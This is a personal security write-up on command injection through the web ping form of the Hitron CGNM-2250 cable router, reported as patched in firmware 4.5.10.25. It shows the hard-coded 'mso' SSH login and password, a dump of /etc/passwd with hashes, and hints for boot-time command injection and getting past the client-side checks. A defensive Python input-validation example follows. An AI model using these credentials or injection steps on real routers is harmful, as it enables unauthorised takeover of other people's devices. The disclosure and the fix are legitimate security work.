Remote code execution with Hitron CGNM-2250
Edit: This has been fixed in the latest firmware update, 4.5.10.25.
The routers that you receive from your ISP are almost always garbage: not many options to configure and pitiful wifi range. The router/modem that Shaw customers receive, the Hitron CGNM-2250, thankfully isn't completely terrible: 802.11ac plus gigabit ports. I was poking about and researching the model and came upon an exploit for a similar model version that gives remote code execution. The CGNM-2250 is vulnerable as well; for reference, my software version is 4.5.8.20 with hardware version 1A. The input for the ping utility in the web interface isn't sanitized, so you can enter arbitrary input. I discovered that it has a few basic utilities, including Dropbear.
From there you can ssh into your router with
ssh mso@192.168.0.1 -p 29
The password is msopassword (go figure!)
You'll be greeted with a fun menu driven interface.
Most of the menus are for debugging and initial programming purposes. There is a menu option to set the TFTP download image URL used to flash the device, so it might be possible to flash your own firmware, though I don't know how feasible that is.
Going back to the web interface, I was able to see what tools and programs are available on the router.
It is your basic Linux system, busybox plus some manufacturer utilities. For a full list of binaries available see below:
#/sbin
wlanconfig
wifitool
wifirrm
watchdog
vconfig
utelnetd
udhcpd
udhcpc
udevstart
udevsend
udevd
udev
ti_udhcpc
ti_todc
ti_tftp
ti_syslogd
ti_dhcp6c
start-stop-daemon
route
rmmod
reboot
radartool
poweroff
pktlogdump
pktlogconf
manufacture_ath_throughput_sta
manufacture_ath_throughput_ap
makeVAP
lsmod
klogd
killVAP
iwpriv
iwlist
iwconfig
insmod
init
ifconfig
ht_wifi_ioctl
ht_atom_cmd
hostapd_cli
hostapd
halt
fsck.ext3
fdisk
cfg
blockdev
atomcmdlist
athstatsclr
athstats
athcfg_api
arp
apup
apstats
apdown
apcfg
activateVAP
80211stats
#/usr/bin
which
uptime
traceroute6
traceroute
tr
top
tftp
test
renice
pstree
pmap
mkfifo
logger
killall
hexdump
head
free
flock
find
expr
dirname
cut
crontab
basename
awk
add-shell
[[
[
#/bin
xmlwf
umount
touch
tar
sync
sleep
sh
sed
rm
pwd
ps
ping6
ping
pcap-config
netstat
mv
mount
more
mknod
mkdir
luac
lua
ls
login
ln
kill
iptunnel
iprule
iproute
iplink
ipaddr
ip
hostname
grep
getopt
false
echo
dnsdomainname
dmesg
df
dd
date
cp
clnkstat
clnkrst
clnkqos
clnkpm
clnkmocamib
clnkmem
clnkmcast
clnkhwtst
clnkfwupd
clnkcfg
clinkd
chown
chmod
cat
busybox
bash
ash
DCAP.46
DCAP.45
DCAP.44
DCAP.42
DCAP.41
DCAP.40
DCAP.38
DCAP.37
DCAP.35
DCAP.19
DCAP.18
DCAP.16
DCAP.137
DCAP.132
DCAP.126
DCAP.125
DCAP.123
DCAP.122
DCAP.116
DCAP.115
DCAP.112
DCAP.111
DCAP.110
DCAP.109
DCAP.107
DCAP.104
DCAP.103
DCAP.102
DCAP.101
DCAP.08
DCAP.03
DCAP.02
DCAP
CandDdvr.ko
#/usr/sbin
watchdog_rt
upstream_manager_1q
upstream_manager
upgradebox
update
testmode_handle.sh
testmode
sync_app_np_reboot
swdl2
sw_dl
snmpcmd
snmp_agent_cm
setstartup
setkey
setenv
sched
runall
rpc_reverse_server_util
rpc_reverse_server
rpc_management_server
rpc_ifconfig
rfs.cfg
rfs
regs
qos_dsx_sm
productionmode
printenv
pp_fw_download
portmap
pmap_set
pmap_dump
pcd
nvtst
nvread
mptint
mlx
logger
ledcfg
l2switch_iram.img
l2switch_init
l2switch_dram.img
iostat
iccctl
icc_genEvent
htxvendordb
ht_iwcmd
ht_buttond
hal_tuner_mgr
hal_event_mbox
hal_cmd_mbox
gptimer
gim
getenv
getPortByMAC.sh
flash_eraseall
fdump
ext_switch_init
eventmgr_cm
energy_manager_app
dpp_dev_init.sh
downstream_manager
docsis_mac_manager
docsis_mac_driver
docsis_init_once
docsis_dl_box
docsis_config_to_text
dmg_provisioning
dl
dispatcher
dfltr_class_init.sh
ddl
dbridge_mdf_init.sh
dbridge_l2vpn_ds_init.sh
dbridge_init
crond
cmdl
cm_status
cli_net.sh
cli_mem.sh
cli
chroot
cefdk
cc_init_once
brctl
bpi_tek
bpi_sa_map
bpi_auth
MxL_HRCLS_FW_4.1.5.5.mbin
MxL_HRCLS_FW.mbin
FwUpstreamDocsis3_I.bin
FwUpstreamDocsis3_D.bin
FwUpstreamDocsis2_I.bin
FwUpstreamDocsis2_D.bin
Through digging in the CLI menu I found that /etc/scripts/sys_startup.sh is run on startup, making it easier to inject any commands you want to run at boot. I haven't been able to get to a shell yet, since logging in as the 'mso' user takes you straight to the CLI menu. But cat /etc/passwd reveals:
root:$1$27272727:0:0::/:/bin/false
nobody:$1$27272727:65535:65535::/:/bin/false
mso:$1$1w7AswO3$IJCko5PwRk6ChJrIYgMQs/:100:100::/:/usr/sbin/cli
One should be able to symlink /usr/sbin/cli to /bin/sh so that logging in drops to a shell. Entering commands via the web interface is a bit tricky since it doesn't like pipes (|); it's just a matter of getting around the JS validation. Once I can get to a shell I'll write a follow-up to this post.
Issue patched in version 4.5.10.25.
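As an added illustration (my own code, not from the post or from Hitron), here is what a server-side fix for the ping form looks like: the target is checked against an allow-list (an IP literal or an RFC 1123 hostname) and then passed to ping as its own argv element with no shell involved, so the JS check is no longer the only line of defence. It also includes a comparison against the 4.5.10.25 release the post reports as fixed, so an operator can tell from a version string whether a unit is still on affected firmware. The function names and the hostname rule are assumptions of this example, not the vendor's implementation.

```python
import ipaddress
import re
import subprocess

# Release the post reports as fixing the ping command injection.
PATCHED_FIRMWARE = (4, 5, 10, 25)

# RFC 1123 label: letters, digits and hyphens, 1-63 chars, no leading or
# trailing hyphen. Rejecting a leading hyphen also stops a "hostname" from
# being parsed by ping as an option (argument injection).
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def parse_firmware(version: str) -> tuple:
    """Turn a dotted version string such as '4.5.8.20' into a comparable tuple."""
    parts = version.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unparseable firmware version: {version!r}")
    return tuple(int(p) for p in parts)


def is_patched(version: str) -> bool:
    """True if the firmware is at or past the release reported as fixed."""
    return parse_firmware(version) >= PATCHED_FIRMWARE


def is_valid_ping_target(target: str) -> bool:
    """Allow-list check: IP literal or hostname only.

    Anything else (shell metacharacters, whitespace, empty strings, leading
    hyphens) is rejected before it gets anywhere near a process."""
    if not target or len(target) > 253:
        return False
    try:
        ipaddress.ip_address(target)   # IPv4 or IPv6 literal
        return True
    except ValueError:
        pass
    labels = target.rstrip(".").split(".")
    return all(_LABEL.match(label) for label in labels)


def ping(target: str, count: int = 3) -> str:
    """Run ping with an argv list: no shell, no string concatenation."""
    if not is_valid_ping_target(target):
        raise ValueError(f"rejected ping target: {target!r}")
    result = subprocess.run(["ping", "-c", str(count), target],
                            capture_output=True, text=True, timeout=30)
    return result.stdout
```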